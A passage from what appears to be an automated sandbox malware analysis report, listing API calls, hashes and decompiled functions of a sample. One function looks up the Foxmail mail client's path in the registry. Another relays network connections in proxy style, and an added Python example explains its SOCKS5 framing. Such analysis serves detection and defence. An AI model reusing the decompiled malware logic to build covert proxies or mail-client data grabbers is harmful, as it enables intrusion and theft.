                                                                    Instruction addresses for the decompiled lines above, in order: 0x02d19dbd 0x02d19df1 0x02d19df1 0x02d19dbf 0x02d19dc2 0x02d19de4 0x00000000 0x02d19de6 0x02d19de7 0x02d19ded 0x02d19ded 0x02d19de4 0x02d19df5

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 02D19DB5
                                                                    • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,02D297B0,?), ref: 02D19DDC
                                                                    • PathRemoveFileSpecA.SHLWAPI(02D297B0), ref: 02D19DE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileOpenPathQueryRemoveSpecValue
                                                                    • String ID: Executable$software\Aerofox\FoxmailPreview
                                                                    • API String ID: 3687894118-2371247776
                                                                    • Opcode ID: 6b2fcfdc77d11dcaf60e6ba696b4b6ca52ec48efa32019b371ed5bf0321a5b05
                                                                    • Instruction ID: 5a7f912afcbf73e13942a96098bb5c25a96ce2c9978fd8f8742422d804969882
                                                                    • Opcode Fuzzy Hash: 6b2fcfdc77d11dcaf60e6ba696b4b6ca52ec48efa32019b371ed5bf0321a5b05
                                                                    • Instruction Fuzzy Hash: 7FF08274680204BBFB208A51EDAAFDA7BBCEB51B48F110054B901B2384E3B0AD499520
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,004074DB,00000064), ref: 00407561
                                                                    • RtlLeaveCriticalSection.NTDLL(0054C04C), ref: 0040756B
                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,004074DB,00000064,?,?,?,0040432D,0054BF30,?,004011FD,?,00000000), ref: 0040757C
                                                                    • RtlEnterCriticalSection.NTDLL(0054C04C), ref: 00407583
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID: }@
                                                                    • API String ID: 3269011525-2912179412
                                                                    • Opcode ID: 4ef03699227fb8913ffadc98d663c796d770d6a4634436a0947b56b88775fad1
                                                                    • Instruction ID: aab872f6a7acfef9fd8cb3f6ec7eb454095510407434c627ffe54de3154b5bd8
                                                                    • Opcode Fuzzy Hash: 4ef03699227fb8913ffadc98d663c796d770d6a4634436a0947b56b88775fad1
                                                                    • Instruction Fuzzy Hash: 58E09B31542128F7CB911B94EC0DACF3F14AB45B547044175F90D63160CB79181067CD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 71df5b6d05a77e10a09afc9c721d25429cfcaee161e24283a212cd1982d61bbb
                                                                    • Instruction ID: 09d79b86bfc68fc8d8345def38c04372266d8933846edeb707a7e989fdc187ec
                                                                    • Opcode Fuzzy Hash: 71df5b6d05a77e10a09afc9c721d25429cfcaee161e24283a212cd1982d61bbb
                                                                    • Instruction Fuzzy Hash: 8E91E9B16002059BDB20CF64D89076A77F59FD6314F24447FD696A73C1EB7EA842CB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E02D1EF4F(intOrPtr __ecx) {
                                                                    				char _v5;
                                                                    				char _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				void _v32;
                                                                    				signed int _v36;
                                                                    				long _v40;
                                                                    				char _v49;
                                                                    				char _v52;
                                                                    				intOrPtr _v72;
                                                                    				char _v76;
                                                                    				char _v80;
                                                                    				void _v84;
                                                                    				char _v100;
                                                                    				char _v2156;
                                                                    				void* _t61;
                                                                    				char _t64;
                                                                    				intOrPtr _t70;
                                                                    				signed int _t77;
                                                                    				void* _t87;
                                                                    				void* _t95;
                                                                    				void* _t99;
                                                                    				signed int _t100;
                                                                    				signed int _t102;
                                                                    				void* _t111;
                                                                    				signed int _t115;
                                                                    				void* _t119;
                                                                    				intOrPtr _t123;
                                                                    				void* _t133;
                                                                    				void* _t134;
                                                                    				void* _t137;
                                                                    
                                                                    				 *0x2d298b4 = __ecx;
                                                                    				while(1) {
                                                                    					_t61 = E02D1F23D( &_v100);
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					if( *0x2d29695 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t99 = 0xc;
                                                                    					_v5 = 0;
                                                                    					_t95 = E02D15F53(_t99);
                                                                    					if(_t95 == 0) {
                                                                    						_t95 = 0;
                                                                    					} else {
                                                                    						asm("stosd");
                                                                    						asm("stosd");
                                                                    						asm("stosd");
                                                                    					}
                                                                    					_t100 = _v32;
                                                                    					_t3 = 0x2d298c0 + _t100 * 0xc; // 0x2d298c0
                                                                    					_t119 = _t3;
                                                                    					if( *_t119 != _t100) {
                                                                    						_t64 = _v5;
                                                                    					} else {
                                                                    						_t64 = 1;
                                                                    						_t95 = _t119;
                                                                    					}
                                                                    					if(_t64 != 0) {
                                                                    						if( *((char*)(_t95 + 4)) != 1) {
                                                                    							_t130 = _v24;
                                                                    							__imp__#19( *(_t95 + 8), _v24, _v28, 0); // ws2_32.dll ordinal 19 = send(): forward the received data on the socket stored in this connection's record
                                                                    						} else {
                                                                    							E02D11052( &_v2156, 0, 0x802);
                                                                    							_v20 = _v20 & 0;
                                                                    							_v16 = _v16 & 0;
                                                                    							_t102 = 8;
                                                                    							memset( &_v84, 0, _t102 << 2);
                                                                    							_t137 = _t137 + 0x18;
                                                                    							asm("stosd");
                                                                    							asm("stosd");
                                                                    							asm("stosw");
                                                                    							_t123 = _v24;
                                                                    							_t70 =  *((intOrPtr*)(_t123 + 3));
                                                                    							if(_t70 != 1) {
                                                                    								if(_t70 != 3) {
                                                                    									if(_t70 == 4) {
                                                                    										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802); // 0x17 = AF_INET6: 16-byte address at offset 4
                                                                    										_t77 = E02D1F33C(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
                                                                    										goto L18;
                                                                    									}
                                                                    								} else {
                                                                    									E02D11052( &_v84, 0, 0x20); // zero the 0x20-byte addrinfo hints
                                                                    									_v80 = 2; // hints.ai_family = AF_INET
                                                                    									_v76 = 1; // hints.ai_socktype = SOCK_STREAM
                                                                    									_v72 = 6; // hints.ai_protocol = IPPROTO_TCP
                                                                    									_t133 = E02D11085(0x200);
                                                                    									E02D1102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
                                                                    									_v36 = _v36 & 0x00000000;
                                                                    									E02D1102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
                                                                    									_t137 = _t137 + 0x28;
                                                                    									_t87 =  &_v84;
                                                                    									__imp__getaddrinfo(_t133, 0, _t87,  &_v20); // resolve the length-prefixed host name, copied to _t133 and NUL-terminated above, to an IPv4 TCP address
                                                                    									if(_t87 == 0) {
                                                                    										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff; // 16-bit port that follows the host name
                                                                    										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4; // addrinfo.ai_addr (offset 0x18) + 4 = sockaddr_in.sin_addr of the first result
                                                                    										goto L12;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								_t134 = _t123 + 4;
                                                                    								__imp__InetNtopW(2, _t134,  &_v2156, 0x802); // 2 = AF_INET: 4-byte address at offset 4, port at offset 8
                                                                    								_t115 =  *(_t123 + 8) & 0x0000ffff;
                                                                    								_t111 = _t134;
                                                                    								L12:
                                                                    								_t77 = E02D1F3BD(_t111, _t115);
                                                                    								L18:
                                                                    								_v16 = _t77;
                                                                    							}
                                                                    							_v52 = 5;
                                                                    							_v49 = 1;
                                                                    							E02D1F1DA( &_v52, 0xa, _v32);
                                                                    							 *(_t95 + 8) = _v16;
                                                                    							 *((char*)(_t95 + 4)) = 2;
                                                                    							_v40 = 0;
                                                                    							asm("movsd");
                                                                    							asm("movsd");
                                                                    							asm("movsd");
                                                                    							CreateThread(0, 0, E02D1F16E, _t95, 0,  &_v40); // one thread per connection record, started once the destination socket is in place
                                                                    							_t130 = _v24;
                                                                    						}
                                                                    						E02D11099(_t130);
                                                                    					} else {
                                                                    						_v12 = 5;
                                                                    						E02D1F1DA( &_v12, 2, _t100);
                                                                    						 *((char*)(_t95 + 4)) = 1;
                                                                    						 *_t95 = _v32;
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    					}
                                                                    				}
                                                                    				return _t61;
                                                                    			}
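                                                                    The message handling that E02D1EF4F performs, as an added Python example written for this page (it is not code from the report or from the sample). Reading the decompiled constants as SOCKS5 (RFC 1928) is my interpretation, not something the report states; it rests on the 2-byte reply starting with 5 sent to a new connection, the 10-byte reply whose bytes 0 and 3 are 5 and 1, the address-type byte at offset 3 taking the values 1, 3 and 4 with the RFC's layouts behind it, and the per-connection state moving from 1 to 2. The example follows the RFC framing and replaces the destination socket with a buffer; all client messages it is fed are constructed.

```python
"""
Added example (not from the report or the sample): SOCKS5 server-side
framing per RFC 1928, written to read E02D1EF4F against.  Treating the
decompiled constants as SOCKS5 is my interpretation; every message below
is constructed.
"""
import ipaddress
import struct
from typing import List, Optional, Tuple

SOCKS_VERSION = 5
METHOD_NOAUTH, METHOD_NONE_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 1, 3, 4      # the 1 / 3 / 4 at *(_t123 + 3)
REP_SUCCEEDED, REP_GENERAL_FAILURE = 0, 1


class SocksError(ValueError):
    pass


def _slice(data: bytes, start: int, end: int) -> bytes:
    chunk = data[start:end]
    if len(chunk) != end - start:
        raise SocksError("truncated message")
    return chunk


def parse_greeting(data: bytes) -> bytes:
    """VER NMETHODS METHODS... -> the 2-byte method-selection reply (VER METHOD),
    the size E02D1EF4F sends to a connection it has not seen before."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        raise SocksError("not a SOCKS5 greeting")
    methods = _slice(data, 2, 2 + data[1])
    chosen = METHOD_NOAUTH if METHOD_NOAUTH in methods else METHOD_NONE_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def parse_connect(data: bytes) -> Tuple[str, int]:
    """VER CMD RSV ATYP DST.ADDR DST.PORT -> (host, port).
    1 = 4-byte IPv4 at +4, 3 = length byte at +4 then the name, 4 = 16-byte
    IPv6 at +4; the 16-bit port follows the address in network byte order."""
    if len(data) < 5 or data[0] != SOCKS_VERSION:
        raise SocksError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if cmd != CMD_CONNECT:
        raise SocksError("unsupported command %d" % cmd)
    if atyp == ATYP_IPV4:
        addr_end = 4 + 4
        host = str(ipaddress.IPv4Address(_slice(data, 4, addr_end)))
    elif atyp == ATYP_IPV6:
        addr_end = 4 + 16
        host = str(ipaddress.IPv6Address(_slice(data, 4, addr_end)))
    elif atyp == ATYP_DOMAIN:
        addr_end = 5 + data[4]
        host = _slice(data, 5, addr_end).decode("ascii")
    else:
        raise SocksError("unknown address type %d" % atyp)
    (port,) = struct.unpack("!H", _slice(data, addr_end, addr_end + 2))
    return host, port


def build_connect_reply(rep: int, bind_addr: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """10-byte reply VER REP RSV ATYP=1 BND.ADDR(4) BND.PORT(2): the 0xa-byte
    buffer the sample fills with 5 at offset 0 and 1 at offset 3."""
    return (bytes([SOCKS_VERSION, rep, 0, ATYP_IPV4])
            + ipaddress.IPv4Address(bind_addr).packed
            + struct.pack("!H", bind_port))


class SocksSession:
    """Per-connection state as the sample keeps it at *(_t95 + 4): 1 after the
    greeting reply, 2 once CONNECT has been answered; later data is relayed
    (the sample calls ws2_32 ordinal 19, send; here it lands in a buffer)."""

    def __init__(self) -> None:
        self.state = 0
        self.destination: Optional[Tuple[str, int]] = None
        self.relayed = bytearray()

    def feed(self, data: bytes) -> bytes:
        if self.state == 0:
            reply = parse_greeting(data)
            self.state = 1
            return reply
        if self.state == 1:
            try:
                self.destination = parse_connect(data)
            except SocksError:
                return build_connect_reply(REP_GENERAL_FAILURE)
            self.state = 2
            return build_connect_reply(REP_SUCCEEDED)
        self.relayed += data
        return b""


def run_session(messages: List[bytes]) -> Tuple[int, Optional[Tuple[str, int]], List[bytes]]:
    """Drive one session through constructed client messages; returns the final
    state, the parsed destination and the reply to each message."""
    session = SocksSession()
    replies = [session.feed(m) for m in messages]
    return session.state, session.destination, replies
```

                                                                    Two details of the decompilation differ from the RFC and are left as they are above: the IPv6 branch reads its port from offset 8 instead of after the 16-byte address, and the domain branch resolves with AF_INET hints only, so an IPv6-only name fails there. A real implementation replaces the relayed buffer with the connected socket and the thread E02D1F16E stands for.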

                                                                    Instruction addresses for the decompiled lines above, in order: 0x02d1ef58 0x02d1f14a 0x02d1f14e 0x02d1f160 0x02d1f161 0x02d1f162 0x02d1f163 0x00000000 0x00000000 0x02d1ef68 0x02d1ef69 0x02d1ef72 0x02d1ef76 0x02d1ef81 0x02d1ef78 0x02d1ef7c 0x02d1ef7d 0x02d1ef7e 0x02d1ef7e 0x02d1ef83 0x02d1ef89 0x02d1ef89 0x02d1ef91 0x02d1ef99 0x02d1ef93 0x02d1ef93 0x02d1ef95 0x02d1ef95 0x02d1ef9e 0x02d1efc9 0x02d1f131 0x02d1f13d 0x02d1efcf 0x02d1efdd 0x02d1efea 0x02d1efed 0x02d1eff2 0x02d1eff3 0x02d1eff3 0x02d1eff8 0x02d1eff9 0x02d1effa 0x02d1effc 0x02d1efff 0x02d1f004 0x02d1f030 0x02d1f0ba 0x02d1f0ce 0x02d1f0da 0x00000000 0x02d1f0da 0x02d1f036 0x02d1f03e 0x02d1f048 0x02d1f04f 0x02d1f056 0x02d1f066 0x02d1f06e 0x02d1f073 0x02d1f084 0x02d1f089 0x02d1f090 0x02d1f097 0x02d1f09f 0x02d1f0a5 0x02d1f0b0 0x00000000 0x02d1f0b0 0x02d1f09f 0x02d1f006 0x02d1f012 0x02d1f018 0x02d1f01e 0x02d1f022 0x02d1f024 0x02d1f024 0x02d1f0df 0x02d1f0df 0x02d1f0df 0x02d1f0eb 0x02d1f0f1 0x02d1f0f5 0x02d1f104 0x02d1f10f 0x02d1f116 0x02d1f11b 0x02d1f123 0x02d1f125 0x02d1f126 0x02d1f12c 0x02d1f12c 0x02d1f144 0x02d1efa0 0x02d1efa6 0x02d1efac 0x02d1efb6 0x02d1efba 0x02d1efbd 0x02d1efbe 0x02d1efbf 0x02d1efbf 0x02d1f149 0x02d1f16d

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv
                                                                    • String ID:
                                                                    • API String ID: 1507349165-0
                                                                    • Opcode ID: c86664b8a3e79898c480d91d957e9ba998ed2d35eb4e6cd06841a52bb7308115
                                                                    • Instruction ID: 16d1df3652896241909326fb77aea3a7e1a7b5b1f9a2bf5d98e8b79432cce1cd
                                                                    • Opcode Fuzzy Hash: c86664b8a3e79898c480d91d957e9ba998ed2d35eb4e6cd06841a52bb7308115
                                                                    • Instruction Fuzzy Hash: B461D572D44218BEEB10CFA4E845BEEB7B9FF04300F158059E944AB781D7B5AD49CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0040E77F,00000000,?,?,00000000,00000000,0040E77F,?,00000000,?,0040E77F,00000001,?,?,00000001,0040E77F), ref: 00411510
                                                                    • __alloca_probe_16.LIBCMT ref: 00411539
                                                                    • MultiByteToWideChar.KERNEL32(0040E77F,00000001,?,?,00000000,?), ref: 00411585
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040D49E), ref: 00411597
                                                                    • __freea.LIBCMT ref: 004115A0
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 3246cc23d97c087d84055473fece610c31b770d29c33b2c316651a19d1730add
                                                                    • Instruction ID: 05ac2beabbc3f6f9b50eb319e2aa142b7ab290b7d392ed1820b185fa7d947a0d
                                                                    • Opcode Fuzzy Hash: 3246cc23d97c087d84055473fece610c31b770d29c33b2c316651a19d1730add
                                                                    • Instruction Fuzzy Hash: B431067190020ABBDB209F65DC40DEF7BBAEF84710F05416AFA05A7261D7388D91CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 02D1EEB4
                                                                    • gethostbyname.WS2_32(?), ref: 02D1EEBD
                                                                    • htons.WS2_32(?), ref: 02D1EEE1
                                                                    • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 02D1EF12
                                                                    • connect.WS2_32(00000000,?,00000010), ref: 02D1EF2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InetNtopconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 2393792429-0
                                                                    • Opcode ID: 1058f91352ab9e601b44e465007be6a5670c454b5295a4bbb1c7b61333a145ed
                                                                    • Instruction ID: 17a31c87c7d1ac37814cb36101f7000bb2473a472d03726e458727269bdaedd1
                                                                    • Opcode Fuzzy Hash: 1058f91352ab9e601b44e465007be6a5670c454b5295a4bbb1c7b61333a145ed
                                                                    • Instruction Fuzzy Hash: 7111D672D40254BBE72097A4BC49FAB77ECEF15321F114865FD49D7281D6708D5887A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004108B7
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004108DA
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00410900
                                                                    • _free.LIBCMT ref: 00410913
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00410922
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 0af92fc74c162632bf3be315d882d9b83aa6ea7ca49924c7f1816ffeebf3793e
                                                                    • Instruction ID: 34f974fb90905a2613f20b0ada7862a26b38e47aeb372a8b299f5cfaed8f77de
                                                                    • Opcode Fuzzy Hash: 0af92fc74c162632bf3be315d882d9b83aa6ea7ca49924c7f1816ffeebf3793e
                                                                    • Instruction Fuzzy Hash: A401B5B27116197B732126B75C98CBB6A6DDEC6B60315012EB904C7202DFB88D8281B8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0040AA2A,0040DDBD,?,?,00408222,?,?,00407B01,?,2CD7C1E8), ref: 0040DBEF
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0040AA2A,0040DDBD,?,?,00408222,?,?,00407B01,?,2CD7C1E8), ref: 0040DC15
                                                                    • _free.LIBCMT ref: 0040DC55
                                                                    • _free.LIBCMT ref: 0040DC88
                                                                    • SetLastError.KERNEL32(00000000), ref: 0040DC95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 3a62f75f6f6d473855ada7fce9feacd53a03f44f5891ded4776ade272f0317d5
                                                                    • Instruction ID: 22418cb6036aa0ddd6ca84a637dcae786ebeb05e80c2cc32edb63c71d5d2d1d2
                                                                    • Opcode Fuzzy Hash: 3a62f75f6f6d473855ada7fce9feacd53a03f44f5891ded4776ade272f0317d5
                                                                    • Instruction Fuzzy Hash: 5C11CA7D90890066E2122BB65D45D6B265DEBC2368714013BF514B22D1DEBD880A902D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,0040B1FE,?,00000000,?,0040E3E2,?,00000000,00000000,?,00000000), ref: 0040DAA0
                                                                    • _free.LIBCMT ref: 0040DAF7
                                                                    • _free.LIBCMT ref: 0040DB2B
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DB38
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0040E3E2,?,00000000,00000000,?,00000000), ref: 0040DB44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: a727337b5316149c2bce10c2231949ffc9b3182f12930bc09bc4b33c9c82bc90
                                                                    • Instruction ID: bb2762f6d32e43f8edf6b61ddcf376971766f196208522f48f112671c941c404
                                                                    • Opcode Fuzzy Hash: a727337b5316149c2bce10c2231949ffc9b3182f12930bc09bc4b33c9c82bc90
                                                                    • Instruction Fuzzy Hash: D311C63DA4490066D2127BF6AC05E7B316AAFC1328B29013BF920B63E1DE7C880A611D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1990A(intOrPtr _a4, intOrPtr _a8) {
                                                                    				void _v28;
                                                                    				void* _t13;
                                                                    				signed int _t14;
                                                                    
                                                                    				InitializeCriticalSection( &_v28);
                                                                    				_t14 = 6;
                                                                    				DeleteCriticalSection(memcpy(0x2e5db10,  &_v28, _t14 << 2));
                                                                    				EnterCriticalSection(0x2e5db10);
                                                                    				 *0x2e5db38 = _a4;
                                                                    				GetModuleHandleA(0);
                                                                    				 *0x2d296a0 = 0x2e5d0e8;
                                                                    				if(_a8 == 0) {
